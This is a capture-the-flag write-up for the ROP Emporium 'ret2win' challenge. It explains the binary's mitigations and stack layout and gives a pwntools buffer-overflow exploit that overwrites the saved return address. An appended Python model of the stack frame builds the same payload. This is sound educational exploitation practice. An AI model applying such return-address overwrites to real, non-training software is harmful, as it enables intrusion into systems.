
System (Pwnable)

ROP Emporium - ret2win writeup



 

https://ropemporium.com/challenge/ret2win.html

 

Challenge description (ropemporium.com): Locate a method that you want to call within the binary. Call it by overwriting a saved return address on the stack.

 

 

checksec shows that NX is the only hard mitigation in play: there is no stack canary, so the overflow can reach the saved return address undetected, and no PIE, so ret2win() lives at a fixed address. Partial RELRO does not matter here because the exploit never touches the GOT.

[*] '/home/ubuntu/dreamhack/ret2win'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

 

Looking at the binary in Ghidra and gdb, the code is simple enough to go straight to the exploit: pwnme() has a 0x20-byte stack buffer, followed by the 8-byte saved rbp and then the saved return address, so the return address sits at offset 0x28 from the start of the buffer. Overwriting it with the address of ret2win() (0x400756, the binary is not stripped) is the whole exploit.

from pwn import *

context(arch='amd64')
p = process('./ret2win')

# Address of ret2win() in the non-PIE binary (symbol visible, binary is not stripped)
ret2win = 0x400756

# pwnme() prints its banner and then prompts with "> " before calling read()
p.recvuntil(b'read()!')
p.recvuntil(b'> ')

# 0x20 bytes of buffer + 0x08 bytes of saved rbp, then the saved return address
payload = b'A' * 0x20 + b'B' * 0x08
payload += p64(ret2win)

# The binary uses read(), so null bytes inside p64() are not a problem
p.send(payload)

# ret2win() prints the flag; read until the process exits.
# If it instead dies with SIGSEGV on a movaps inside system(), the stack is
# misaligned: put the address of a lone `ret` gadget in front of ret2win.
print(p.recvall(timeout=2).decode(errors='replace'))
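To make the offset arithmetic and the overwrite itself visible without running the binary, here is an added example (not part of the original writeup, and not ROP Emporium's code) that models pwnme()'s stack frame with the standard library only. The buffer size (0x20), the accepted read length (0x38) and the ret2win() address (0x400756) come from the challenge and the writeup above; the saved rbp and the original return address stored in the toy frame are placeholders, and the `ret` gadget address used in the usage below is hypothetical. The optional `ret_gadget` slot shows the stack-realignment trick for the movaps crash that ROP Emporium's beginner's guide warns about.

```python
import struct

# Frame layout of pwnme(): a 32-byte stack buffer that read() fills with up to
# 56 bytes, followed by the saved rbp and the saved return address.
BUF_SIZE = 0x20                      # 32-byte buffer
SAVED_RBP = 0x08                     # saved frame pointer
RET_OFFSET = BUF_SIZE + SAVED_RBP    # 0x28: distance from buf[0] to the saved rip
READ_LEN = 0x38                      # read(0, buf, 0x38): 56 bytes accepted

RET2WIN = 0x400756                   # address of ret2win() from the writeup above


def p64(value):
    """Little-endian 8-byte pack, same as pwntools' p64 on amd64."""
    return struct.pack('<Q', value)


def build_payload(target, offset=RET_OFFSET, ret_gadget=None):
    """Padding up to the saved return address, then the address to return into.

    ret_gadget: optional address of a lone `ret`; returning through it first
    realigns rsp to 16 bytes before ret2win() runs, which is the fix when
    system() later faults on a movaps instruction.
    """
    payload = b'A' * offset
    if ret_gadget is not None:
        payload += p64(ret_gadget)
    payload += p64(target)
    if len(payload) > READ_LEN:
        raise ValueError(f'payload is {len(payload)} bytes, read() only takes {READ_LEN}')
    return payload


class PwnmeFrame:
    """Toy model of pwnme()'s stack frame; the stored addresses are placeholders."""
    ORIG_RBP = 0x7ffc00001000   # placeholder saved rbp (constructed)
    ORIG_RIP = 0x4006f0         # placeholder return address into main() (constructed)

    def __init__(self):
        self.mem = bytearray(BUF_SIZE) + p64(self.ORIG_RBP) + p64(self.ORIG_RIP)

    def read(self, data):
        """Mimic read(0, buf, 0x38): copies up to 56 bytes into a 32-byte buffer.

        No check against BUF_SIZE: the bytes overrun into the saved rbp and the
        saved rip (anything past the 48-byte frame just grows the bytearray,
        standing in for the caller's frame).
        """
        data = data[:READ_LEN]
        self.mem[:len(data)] = data
        return len(data)

    def saved_rbp(self):
        return struct.unpack_from('<Q', self.mem, BUF_SIZE)[0]

    def saved_rip(self):
        return struct.unpack_from('<Q', self.mem, RET_OFFSET)[0]


def exploit_frame(target=RET2WIN, ret_gadget=None):
    """Return (saved rip before, saved rip after) once the payload has been read in."""
    frame = PwnmeFrame()
    before = frame.saved_rip()
    frame.read(build_payload(target, ret_gadget=ret_gadget))
    return before, frame.saved_rip()


if __name__ == '__main__':
    before, after = exploit_frame()
    print(f'saved rip: {before:#x} -> {after:#x}')
    # Hypothetical gadget address, only to show the realigned chain's layout
    _, after_aligned = exploit_frame(ret_gadget=0x4005f0)
    print(f'with ret gadget first: saved rip -> {after_aligned:#x}')
```

The 48-byte payload fits comfortably in the 56 bytes read() accepts, and even the realigned chain (padding + `ret` + ret2win) is exactly 56 bytes; build_payload() raises if a guessed offset would push the chain past what read() will take, which is the first thing to check when an offset found with cyclic patterns does not match the 0x28 derived from the frame.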
